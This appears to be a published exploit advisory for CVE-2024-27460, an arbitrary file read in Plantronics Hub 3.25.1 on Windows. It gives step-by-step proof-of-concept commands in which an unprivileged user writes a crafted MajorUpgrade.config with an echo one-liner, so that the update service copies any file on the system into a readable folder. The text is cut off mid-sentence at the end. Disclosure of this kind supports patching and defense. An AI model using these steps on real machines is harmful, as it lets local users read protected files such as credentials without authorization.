# Exploit Title: Plantronics Hub 3.25.1 โ€“ Arbitrary File Read  
# Date: 2024-05-10  
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from  
# Vendor Homepage:  
# Version: Plantronics Hub for Windows version 3.25.1  
# Tested on: Windows 10/11  
# CVE : CVE-2024-27460  
As a regular user drop a file called "MajorUpgrade.config" inside the  
"C:\ProgramData\Plantronics\Spokes3G" directory. The content of  
MajorUpgrade.config should look like the following one liner:  
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config  
Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy  
(any file on the system). The desired file will be copied into C:\Program  
Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp  
Steps to reproduce (POC):  
- Open cmd.exe  
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G  
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config  
- Desired file will be copied into C:\Program Files